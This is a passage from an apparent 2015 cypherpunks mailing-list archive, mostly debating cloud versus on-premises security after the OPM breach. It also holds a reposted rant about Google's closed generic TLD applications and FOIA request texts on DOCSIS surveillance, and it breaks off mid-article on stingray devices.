VM/container management APIs that are mappable to all kinds of implementations will allow apps, administration, networking, etc. to be fluid between commercial and various types of private clouds. In a lot of ways, this is an elegant solution and could arguably be much more secure than desktop apps in Windows. Assuming your container system isn't running in Windows, which is becoming an option; one that I won't trust easily. sdw On 7/14/15 8:52 AM, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" > > --dan -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1978 bytes Desc: not available URL: From kurt.buff at gmail.com Tue Jul 14 10:09:42 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 10:09:42 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: While I understand and share the sentiment, I'm beginning to wonder if it might make sense to simply ask "why?", and keep asking that until some straight answers emerge. Because, as mothers everywhere ask "if some of your friends jumped off a cliff, would that make it the right and smart thing to do, or merely the popular and stupid thing?" Kurt On Tue, Jul 14, 2015 at 8:52 AM, wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" > > --dan From kurt.buff at gmail.com Tue Jul 14 10:20:38 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 10:20:38 -0700 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: On Tue, Jul 14, 2015 at 10:02 AM, Stephen D. Williams wrote: > Everything will be run in the cloud and browser because it is, overall, a > better computation model. Certainly that's the current bias, but web browser as platform isn't really all that it's cracked up to be, IMHO - all browsers suck, and I don't see them getting better any time soon, especially if they run javascript and plugins. > However, that doesn't preclude you from running a > cloud locally. Certainly better than public/commercial clouds - at least until proven encryption becomes the norm. > Although pretty much proprietary to Google & Amazon until > recently, Docker et al and related VM/container management APIs that are > mappable to all kinds of implementations will allow apps, administration, > networking, etc. to be fluid between commercial and various types of private > clouds. > > In a lot of ways, this is an elegant solution and could arguably be much > more secure than desktop apps in Windows. Assuming your container system > isn't running in Windows, which is becoming an option; one that I won't > trust easily. Eh - good sysadmins with good managers/policies can secure Windows just fine, though I do like jails under FreeBSD... Kurt From s at ctrlc.hu Tue Jul 14 02:03:19 2015 From: s at ctrlc.hu (stef) Date: Tue, 14 Jul 2015 11:03:19 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: References: Message-ID: <20150714090319.GG6906@ctrlc.hu> On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > https://plus.google.com/communities/109624826715876091211 > Encryption Rights - Protecting Our Rights to Strongly Encrypt > By Lauren Weinstein > http://www.vortex.com/lauren but wtf in the middle of the kraakens tentacles? wth do people still trust google? even laura. wtf? the mind boggles. -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From drwho at virtadpt.net Tue Jul 14 11:28:30 2015 From: drwho at virtadpt.net (The Doctor) Date: Tue, 14 Jul 2015 11:28:30 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A554CE.6090009@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/14/2015 08:52 AM, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which I > have access (sorry to be oblique), it was said by a CxO "We have to > prepare for the day when no software we depend on is run on > premises." On the other hand, what about the day when you can't trust any software you don't run on machines down the hall because any or all providers can be legally forced to sell you out and never tell you? At least if you have your own data center, you know when you've pissed someone off enough to come after you because they have to knock on your front door. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "It's filled with seven cannon balls, and it doesn't talk." -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVpVTGAAoJED1np1pUQ8Rkd/8QAIFx8am/MvckD4TdpHT2Acm9 EhmAorPmgkQ4iCjz+H4RcGLC51nMmdpQymE0pLe1Rl254qUf2uIhVS/GZNO0Q3+Q reKRwO+v1hz1zU82Ps8bDdr0E3PcfDyuUth1DU8rLeQTaeZD+ul1ngM1N57rQ6jy oMzUKnlcQ6jGs7tYJRgVlucyIEO1G/mxYdrK9yFyUCoYmZPzGaJVq7LcnqxJ/LBb FbeUj14sXJafKPE+MvawtVjMCtp2cAqs1+mWpS/40m7ZsQAxo7RSbHaI04vtJIA+ WXg2UxBbsFwe7mKTvI8i7IQPH2By2UZXqrakFwmQOcqZmyxoGEbUDnODv3L1+J8e A1qCVjUriD87xWD5VH2D9niGUoaEjeQIn8T1N0LsHUeqg/5XXeNpMbnJ808HXvsM S9hRZXNgDbcvRD0J+2STCVE8KOYYk4ejt0rTT+gvfM155Ioa25qpVRJ6CiF9ZYae /uFMh3XHxcwfEILbCQ/lX1OcEM7aA39yPUflt1ujnUYcB15Q9UEZ5gDOaVCMdag2 /0TZAPmzz4r8BfAloY+8YIJT0NbDzWtyKyS1+3miuNuRtx780ymXabHdDUv+hf1m xWrTc0QeKk96D0hsSvw536H8NFb7QDSoHyGDl2tpJ9ju/SNY7EQgyqtKmlk+73WC Pq7jfnIk9F0hk/seYrCj =9O10 -----END PGP SIGNATURE----- From drwho at virtadpt.net Tue Jul 14 11:29:35 2015 From: drwho at virtadpt.net (The Doctor) Date: Tue, 14 Jul 2015 11:29:35 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A5550F.4030008@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/14/2015 10:09 AM, Kurt Buff wrote: > Because, as mothers everywhere ask "if some of your friends jumped > off a cliff, would that make it the right and smart thing to do, or > merely the popular and stupid thing?" On the third tentacle, what if they know something you don't, and are busily saving their own skins? - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "It's filled with seven cannon balls, and it doesn't talk." -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVpVUPAAoJED1np1pUQ8RkIwoP+wfHCxzogbgBbburJyxnFNx9 3av8szuunTJVQ0mC9GbVyZDAyuSv2EwxC0jstdxcvWOjl0QLMMWsVrPkFGreLb81 ldvzcgEK9rsnkaituFKYvRXFllz43Pakqj1DMkPUKKV6YnB5z3lvtwrR2oCsp/hZ jmGwOj2+Vf602zaRQSPuABS5Indro4K/7RH+vYVzuOoZTIA6K6yvy62QWKpN7gxI H+3Hrukbb8GisTkFE/Ip2MESX34IF6cQZOfgI8ivkHckmYh+Olz5i8mSD5TxyT9C ATJ+VhEPQ6wcOp+t1IU9xGe7cLDJJNOparUbe8c3vByRZYKaCADiaykBFot5bkdX 5PZpu+0Xlgjbd8vOBW5M2isAADbe/GvLXq4tSmugPxEaS2u1zPyoE299FqWxMYgk 8DwUMu2mZWq4kMxjaTEargtbylZpkAkMlcQ2LuTSkLqKBGRQbhjZn5SgyUX2E7HM A5uEPbv2vA+33eouPUpBGpQY5w1xABSMarsvykZKaKV+U68PSbOPfq8TsoVt2R0F LeqR7nkMp1X+sl6Q5WzaDSJaiPa/gZOsWAwxcV1Xj78v+dWOenMbw0wfianIPb96 WC1CT5eoQQ6HkwNgjJpUOdZgGhDoGKyBWDWULykoSYEjVYuq9Kfr0sCPWAx6Ckqq vr1EVtG84VjvoQgzv8i1 =FR0p -----END PGP SIGNATURE----- From dan at geer.org Tue Jul 14 08:52:03 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 14 Jul 2015 11:52:03 -0400 Subject: an ominous comment Message-ID: <20150714155203.826F52282E2@palinka.tinho.net> Discussing security policy post-OPM debacle in a setting to which I have access (sorry to be oblique), it was said by a CxO "We have to prepare for the day when no software we depend on is run on premises." I did not handle this well (think sputtering as an alternative to white rage). At the same time, I am probably in a bubble in that I suspect that nearly everyone I see with a computer (of any form factor) is already in that situation or, save for Javascript piped in from the cloud to run locally, soon will be -- denizens of this list and a few others excepted. Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, perhaps, "Is anything to be done?" --dan From kurt.buff at gmail.com Tue Jul 14 12:26:52 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 12:26:52 -0700 Subject: an ominous comment In-Reply-To: <55A5550F.4030008@virtadpt.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A5550F.4030008@virtadpt.net> Message-ID: On Tue, Jul 14, 2015 at 11:29 AM, The Doctor wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On 07/14/2015 10:09 AM, Kurt Buff wrote: > >> Because, as mothers everywhere ask "if some of your friends jumped >> off a cliff, would that make it the right and smart thing to do, or >> merely the popular and stupid thing?" > > On the third tentacle, what if they know something you don't, and are > busily saving their own skins? In which case, they should be able to justify, to me, why they're jumping - I'm reasonably intelligent, and can usually follow along... Kurt From list at sysfu.com Tue Jul 14 12:49:10 2015 From: list at sysfu.com (Seth) Date: Tue, 14 Jul 2015 12:49:10 -0700 Subject: an ominous comment In-Reply-To: <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> Message-ID: On Tue, 14 Jul 2015 12:28:54 -0700, Anthony Michaels wrote: > The more time goes by, the more I agree with Ed Snowden and his > statement about the Internet dividing into two groups: those who are > part of the technical elite and have the ability to protect themselves > and those who don't and must accept that their privacy will be raped at > will. Agreed, however if dedicated people who care about freedom/privacy/liberty can build hardware and software products that are by default distributed, encrypted, and safe to use __by non-technical people__, then it's game over for the centralized control freak bloodsucking vampire fiat currency bankster predasites. (predator/parasites) From tbiehn at gmail.com Tue Jul 14 10:26:11 2015 From: tbiehn at gmail.com (Travis Biehn) Date: Tue, 14 Jul 2015 13:26:11 -0400 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: On Tue, Jul 14, 2015 at 1:20 PM, Kurt Buff wrote: > On Tue, Jul 14, 2015 at 10:02 AM, Stephen D. Williams wrote: > > Everything will be run in the cloud and browser because it is, overall, a > > better computation model. > > Certainly that's the current bias, but web browser as platform isn't > really all that it's cracked up to be, IMHO - all browsers suck, and I > don't see them getting better any time soon, especially if they run > javascript and plugins. > > > However, that doesn't preclude you from running a > > cloud locally. > > Certainly better than public/commercial clouds - at least until proven > encryption becomes the norm. > > > Although pretty much proprietary to Google & Amazon until > > recently, Docker et al and related VM/container management APIs that are > > mappable to all kinds of implementations will allow apps, administration, > > networking, etc. to be fluid between commercial and various types of > private > > clouds. > > > > In a lot of ways, this is an elegant solution and could arguably be much > > more secure than desktop apps in Windows. Assuming your container system > > isn't running in Windows, which is becoming an option; one that I won't > > trust easily. > > Eh - good sysadmins with good managers/policies can secure Windows > just fine, though I do like jails under FreeBSD... > > Kurt > There's data, metadata and computation. Homomorphic encryption is one part of the solution which fits in with least priv / least authority software engineering. Running your own infrastructure provides a false sense of security, anyway, benefits over cloud are likely an illusion. -Travis -- Twitter | LinkedIn | GitHub | TravisBiehn.com | Google Plus -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2867 bytes Desc: not available URL: From jya at pipeline.com Tue Jul 14 10:35:25 2015 From: jya at pipeline.com (John Young) Date: Tue, 14 Jul 2015 13:35:25 -0400 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: Cloud and browser together constitute the most invasive programs since religion was invented and rewarded to absolve overrreaching and abusive authority. Both cloud and browser are deliberately designed to mislead users about their threats to privacy and security. Iterations, adjustments, corrections of errors, automatic upgrades, official endorsements, repeatedly easy hacks, futile hearings of maladies long known and ignored, concentration of computer power, reduction of alternatives, foretell disaster as if natural, expected, bearable, and better than DIY, desktop, solo solutions, mavericks, and worst of all, openness. Cloud and browser are like imperial dogma, what's good for the empire operators is good for the people. Although cloud and browser to succeed must have access to all the people's private data to assure they remain peaceable. Sysadmins are the Cromwells, the Hacking Teams, the Kasperskys, violating law with impunity. At 01:02 PM 7/14/2015, you wrote: >Everything will be run in the cloud and browser because it is, >overall, a better computation model. However, that doesn't preclude >you from running a cloud locally. Although pretty much proprietary >to Google & Amazon until recently, Docker et al and related >VM/container management APIs that are mappable to all kinds of >implementations will allow apps, administration, networking, etc. to >be fluid between commercial and various types of private clouds. > >In a lot of ways, this is an elegant solution and could arguably be >much more secure than desktop apps in Windows. Assuming your >container system isn't running in Windows, which is becoming an >option; one that I won't trust easily. > >sdw > >On 7/14/15 8:52 AM, dan at geer.org wrote: >> >>Discussing security policy post-OPM debacle in a setting to which >>I have access (sorry to be oblique), it was said by a CxO "We have >>to prepare for the day when no software we depend on is run on >>premises." >> >>I did not handle this well (think sputtering as an alternative to >>white rage). At the same time, I am probably in a bubble in that >>I suspect that nearly everyone I see with a computer (of any form >>factor) is already in that situation or, save for Javascript piped >>in from the cloud to run locally, soon will be -- denizens of this >>list and a few others excepted. >> >>Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >>perhaps, "Is anything to be done?" >> >>--dan > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2853 bytes Desc: not available URL: From cypher at cpunk.us Tue Jul 14 12:28:54 2015 From: cypher at cpunk.us (Anthony Michaels) Date: Tue, 14 Jul 2015 14:28:54 -0500 Subject: an ominous comment In-Reply-To: <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> Message-ID: <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> On July 14, 2015 2:14:03 PM CDT, oshwm wrote: >I would say the key question is 'who cares about your data the most?'. > >Do you want someone who's only concern is ticking enough boxes in order >to get paid and not sued or someone who passionately cares about the >data? > >You are the only person who values the security of your data. It's not just about who cares more about your data. Most people don't have a solid enough understanding of security to protect their item data. Just because it's on your computer doesn't mean it's any safer from being grabbed than it is on the public cloud. Sure, you could take the time u to learn good security but most people won't. That's just a utopian dream. The more time goes by, the more I agree with Ed Snowden and his statement about the Internet dividing into two groups: those who are part of the technical elite and have the ability to protect themselves and those who don't and must accept that their privacy will be raped at will. From grarpamp at gmail.com Tue Jul 14 13:44:15 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 14 Jul 2015 16:44:15 -0400 Subject: [Cryptography] Super-computer project wanted In-Reply-To: <55A53867.4090100@sonic.net> References: <55A53867.4090100@sonic.net> Message-ID: >>> dave at horsfall.org >>> So, is there anything that could benefit from a few parallel teraflops here and there? On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: > Or you could apply static code analysis software to huge > masses of existing operating system, device driver, plugin, > email-client or god-help-us browser code in wide use and > see if you can't spot instances of dangerous vulnerabilities > like buffer overflows. A list of known errors would be > very helpful in getting code up to 'bulletproof' reliability > and no one runs ALL the possible static analysis we know > about on large bodies of code because it takes too long on > regular computers. This, and fuzzing... of all the opensource OS's and all the ported packages they supply. And dump all of github in it for fun. It takes too long, too much developer time, a different skillset, opensource test suites may not yet cover some areas that commercial ones do, etc. Ripe for development of an open perpetual audit project. That, and printing your own open and trusted chips, in your own open and trusted fab, are possible now. It's big picture, grand slam, full circle headiness, but it is doable. People just have to get together and kick it off. From juan.g71 at gmail.com Tue Jul 14 14:34:03 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 14 Jul 2015 18:34:03 -0300 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55a58019.e8658c0a.34ac.791f@mx.google.com> On Tue, 14 Jul 2015 10:02:31 -0700 "Stephen D. Williams" wrote: > Everything will be run in the cloud and browser because it is, > overall, a better computation model. This fine mailing list just keeps getting 'better'... From oshwm at openmailbox.org Tue Jul 14 12:14:03 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 14 Jul 2015 20:14:03 +0100 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> I would say the key question is 'who cares about your data the most?'. Do you want someone who's only concern is ticking enough boxes in order to get paid and not sued or someone who passionately cares about the data? You are the only person who values the security of your data. cheers, oshwm. From peter at m-o-o-t.org Tue Jul 14 12:50:11 2015 From: peter at m-o-o-t.org (Peter Fairbrother) Date: Tue, 14 Jul 2015 20:50:11 +0100 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A567F3.1000006@m-o-o-t.org> On 14/07/15 18:02, Stephen D. Williams wrote: > Everything will be run in the cloud and browser because it is, overall, > a better computation model. It is? Why? -- Peter Fairbrother From griffin at cryptolab.net Tue Jul 14 19:30:51 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Tue, 14 Jul 2015 22:30:51 -0400 Subject: Executive Director Needed, Tor Project In-Reply-To: References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: Zenaan Harkness wrote: > On 7/13/15, Griffin Boyce wrote: >> The Doctor wrote: >>> Griffin Boyce wrote: >>> >>>> Whoa whoa whoa. We all know that Vermin Supreme is the community >>>> favorite to become the next Tor E.D. Juan's got no chance. >>> >>> You mean that Adam Weishaupt dropped out of the running? Shame, >>> that. >> >> ^ ▲ illuminati confirmed > > Don't know how many times ... illumiNETti. Sheesh. /\ / \ /,--.\ /< () >\ / `--' \ / dank \ / memes? \ /______________\ From list at sysfu.com Wed Jul 15 00:21:40 2015 From: list at sysfu.com (Seth) Date: Wed, 15 Jul 2015 00:21:40 -0700 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On Tue, 14 Jul 2015 02:45:39 -0700, Shelley wrote: > I'm glad it's not just me! That was my reaction too but I held back > from commenting, because I feel like I'm always bitching here about > cpunks or anyone interested in privacy still using google for any > reason. I don't understand it. I've come to the conclusion that almost without exception, people will opt for convenience over privacy and dignity. Oh, in other news, Google has snapped up several of the new 'public' gTLDs (such as .dev) for their own exclusive use, yay Google. [1] http://sealedabstract.com/rants/google-our-patron-saint-of-the-closed-web/ == Google, Our Patron Saint of the Closed Web ========================================== Lately there’s been a barrage of articles about how Apple is destroying the open web (because “app store, lol”) and it is Time Something Was Done About This: Apple’s paranoid approach to developer relations, and, I assume, relations with other browser vendors (and, in fact, relations to anything outside itself) is becoming a serious liability to the open Web. That is the issue we must confront. Or here: Apple simply does not play well with other vendors when it comes to standardization. The same sort of things we once criticized Microsoft for doing long ago, we give Apple a pass on today. They’re very content to play in their own little sandbox all too often. The answer of course is to petition the Internet Darling Google: In order to forcibly educate Apple to become a responsible web citizen, it is necessary to create a counter-weight; to find a company that will support the open Web and has enough market share to force even web developers who’d prefer to work in iOS only to pay attention to pointer events. That company is Google. Why? Who knows. Maybe because Android is “open”, whatever the hell that means. Maybe it is because Google is strongly pro-net-neutrality, and Apple has made their customary “no comment”. Maybe because Google employees have blogs. The world may never know. Meanwhile, in another part of town, Google has secretly been plotting to destroy the open internet. It started innocently enough Some time around 2008, ICANN determined we didn’t have enough domains. So they decided to open the floodgates on so-called “generic TLDs” or “gTLDs”. Stuff like .app, .ceo, .church, and so on. Of course ICANN cannot actually afford to manage the day-to-day operations of thousands of new TLDs. So they’ve opened the process up to anyone who wants to apply. So you fill out an application, you pay $185,000, there’s a convoluted evaluation process where they ask you questions like whether or not you’re a drug dealer and whether you’re technically qualified to run a TLD, and after a lengthy and bureaucratic review process you basically get your own TLD. It came as no surprise that thousands of applicants came forward in some kind of crazed internet landrush. Many internet companies are placing bets. Amazon made some 76 applications, and Google made even more, with 101. What people did not seem to expect (whether due to incompetence or malice is up for debate) is what they would be used for. Closed TLDs Let’s talk about a domain that’s near and dear to my heart, .dev. Wouldn’t it be great to have a domain for content targeted at software developers? So that you could actually get a domain name for www.[your-side-project].dev? Instead abusing the .io domain which is officially for the British Indian Ocean Territory. Alas, Google does not think much of that plan. Under their shell company “Charleston Road Registry Inc.” (whose “CEO” is merely Google’s in-house counsel), they have applied for control of the .dev domain, which they intend to be: completely closed for the sole use of Google. In case you thought that was a typo, they elaborate: Second-level domain names within the proposed gTLD are intended for registration and use by Google only, and domain names under the new gTLD will not be available to the general public for purchase, sale, or registration. As such, Charleston Road Registry intends to apply for an exemption to the ICANN Registry Operator Code of Conduct as Google is intended to be the sole registrar and registrant. In case you believe Google is drunk and they meant to apply for some other, more Google-specific string, instead of claiming some kind of monopoly over software development in its entitreity, they helpfully clarify that no, they know exactly what they are doing: The proposed gTLD will provide Google with direct association to the term ʺdev,ʺ which is an abbreviation of the word, ʺdevelopment.ʺ The mission of this gTLD, .dev, is to provide a dedicated domain space in which Google can enact second-level domains specific to its projects in development. Specifically, the new gTLD will provide Google with greater ability to create a custom portal for employees to manage products and services in development. I will not bore you with the full application, which is 48 pages and includes such ridiculous details as how Google will respond to abuse claims from itself, and how it will handle disputes from itself if Google files a complaint with Google about Google’s registration of a domain name. Nor will I bother you with the other 100 applications for the other 100 TLDs, which are probably similar but I haven’t read all of them because it’s a Friday night and I have plans, so don’t shoot me if it turns out some of them are more evil than others. But it’s all in there, if you are looking for background material for your next Kafka novel. Update: Somebody did the math. Google wants 27 of them. The backlash begins I know what you’re thinking. “What backlash? I’ve never heard about this.” It turns out that Google’s behavior has annoyed a lot of domain name people. But you haven’t heard about it because you don’t hang out with scummy fly-by-night domainers who run SEO seminars. Nonetheless, there is plenty of buzz about this in those circles. (I can’t believe I just gave them a link.) Governments have also gotten upset too, although you wouldn’t know cause you don’t read boring government reports. The Government of Australia, in particular, has been instrumental in trying to block these proposals. in late 2012 the Australian Government issued 129 early warnings to applicants of strings which raised a number of concerns, including where the applicant was seeking to have exclusive use of a generic term. ICANN’s Governmental Advisory Committee (GAC) subsequently provided advice to the ICANN Board at its Beijing meeting in April 2013, which included a recommendation relating to generic terms, and a non-exhaustive list of generic terms for the Board’s immediate consideration. In response to this controversy, ICANN decided to take a breather and think about if this whole “closed” domain thing was a good idea after all. Google doubles down In response to this criticism, Google backed off on what was clearly an overreach designed to wrest control over the future of the Internet. Haha, just kidding. Instead, Google CIO Ben Fried wrote what I’m pretty sure is the most brazen, jaw-dropping attack on an open Internet that has ever been publicly published by the executive of any Internet company. I mean, flip some words around and it sounds like you’re reading Comcast’s position against Net Neutrality. You should read the entire letter, but here are some highlights. Google opens with a “how-is-this-not-a-parody” argument that owning a TLD and not allowing anyone else to use it “lead[s] to diversified consumer choice”: Today, most Internet users have only one practical choice when it comes to how their TLDs are managed: a completely unrestricted model environment in which any registrant can register any name for any purpose and use it as they see fit. It’s sort of like how North Korea promotes choice because what if some people want to choose a totalitarian regime. They then argue that DNS configuration is too hard and so we should just force all .blog domains to use Google Blogger: By contrast, our application for the .blog TLD describes a new way of automatically linking new second level domains to blogs on our Blogger platform – this approach eliminates the need for any technical configuration on the part of the user and thus makes the domain name more user friendly That Google should be allowed to close TLDs because nobody will notice anyway: Because of the strong user bias toward domains within .com, today a generic .com domain name (e.g., jewelry.com or book.com) is likely to produce more traffic and to be more valuable for a business than a generic TLD. That Google has spent a lot of time and money trying to buy these domains and if you don’t let them bad things will happen Applicants have read the guidebook and relied on the policies contained within to guide their applications. They spent considerable time and money on their applications in the hopes they would be granted the applied for string. At best, retroactively deciding to allow a more restrictive interpretation of the guidebook and at worst going back and “adding in” policy runs the risk of appearing capricious and eroding trust in the process. Do you know what the consequences of not giving Google what they want will be? Do you? DO YOU? DO YOU ICANN?? we must remember that changing the process midstream will have real and practical consequences for businesses and end users alike. “Closed generic TLD”. Who even knows what those words mean anyway? I mean, you’d have to get a dictionary, or maybe (gasp) google it. Words don’t real: In reality, neither of the two words have a contextually appropriate objective definition, and the combined term has no meaning other than what has been invented in recent discussions about the gTLD program. Tell you what though. You know those 101 domains we applied for? We’ll throw you a bone and open 4 of them. That should resolve the “particular sensitivity within the Internet community” about Google closing the Internet. Google has identified four of our current single registrant applications that we will revise: .app, .blog, .cloud and .search. In conclusion Is my conclusion that Apple should get a free pass for hamstringing their web evangelists? No. Get your Safari team a blog, Apple. Let them give a talk at a fucking conference. My point is that if you think Google is some kind of Patron Saint of the Open Web, shit son. Tim Cook on his best day could not conceive of a dastardly plan like this. This is a methodical, coordinated, long-running and well-planned attack on the open web that comes from the highest levels of Google leadership. And we’re giving Apple a free pass? Pshaw. Let’s get serious. These companies are both as good or as bad as we allow them to be. There is no hero here. In the immortal words of John Adams, There is nothing which I dread so much as a division of the republic into two great parties, each arranged under its leader, and concerting measures in opposition to each other. This, in my humble apprehension, is to be dreaded as the greatest political evil under our Constitution. From zen at freedbms.net Tue Jul 14 18:48:25 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 15 Jul 2015 01:48:25 +0000 Subject: Executive Director Needed, Tor Project In-Reply-To: References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: On 7/13/15, Griffin Boyce wrote: > The Doctor wrote: >> Griffin Boyce wrote: >> >>> Whoa whoa whoa. We all know that Vermin Supreme is the community >>> favorite to become the next Tor E.D. Juan's got no chance. >> >> You mean that Adam Weishaupt dropped out of the running? Shame, that. > > ^ ▲ illuminati confirmed Don't know how many times ... illumiNETti. Sheesh. From coderman at gmail.com Wed Jul 15 02:02:04 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:02:04 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On 7/13/15, jim bell wrote: > Someone just reminded me that I have never attended Defcon Jim, this is a feature - not a bug! this year an entire conference track to: WALL OF SHEEP that's right. infosec failed so hard, that now the myriad and many ways in which privacy and security is an utter fuckshitmess, now displayed and exploited across hourly slots in Vegas slimebowl... just don't. every year farther from DEF CON. it's done kids. let it die in dignity! From coderman at gmail.com Wed Jul 15 02:10:13 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:10:13 -0700 Subject: [cryptome] Re: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: two new for DOCSIS tech @FBI, @CIA: "Any and all "DOCSIS" technology records, including cross-references and indirect mentions, including records outside the investigation main file. This is to include a search of each of the following record stores and interfaces: the Central Records System (CRS), the Automated Case Support system ("ACS") Investigative Case Management system ("ICM"), the Automated Case Support system ("ACS") Electronic Case File ("ECF"), and the Automated Case Support system ("ACS") Universal Index ("UNI"). I also request a search of "ELSUR", the database containing electronic surveillance information, for any and all records or activities related to "DOCSIS" or "DOCSIS intercept" or "DOCSIS access" technology. In addition, please extend the search criteria across any external storage media, including I-Drives, S-Drives, or related technologies used during the course of investigation involving Cable internet data services. DITU experimental technologies or research also within scope of this request. Please include processing notes, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above." - https://www.muckrock.com/foi/united-states-of-america-10/indocsis-19725/ "Any and all records, receipts, training, technology transfer programs, research, evaluation technologies, or other materials relevant to "DOCIS" cable communication technology. This is to include "DOCSIS 1.0", "DOCSIS 2.0", "DOCSIS 3.0", and other relevant DOCSIS protocols." - https://www.muckrock.com/foi/united-states-of-america-10/indocsisxfer-19726/ On 7/12/15, coderman wrote: > On 7/12/15, Douglas Rankine wrote: >> Are they giving reasons for the rejections? > > Glomar all around. see also: > > "What Is the Big Secret Surrounding Stingray Surveillance?" > - > http://www.scientificamerican.com/article/what-is-the-big-secret-surrounding-stingray-surveillance/ > > --- > > What Is the Big Secret Surrounding Stingray Surveillance? > > State and local law enforcement agencies across the U.S. are setting > up fake cell towers to gather mobile data, but few will admit it > By Larry Greenemeier | June 25, 2015 > > > Stung: Law enforcement agencies sometimes use a device called a > stingray to simulate a cell phone tower, enabling them 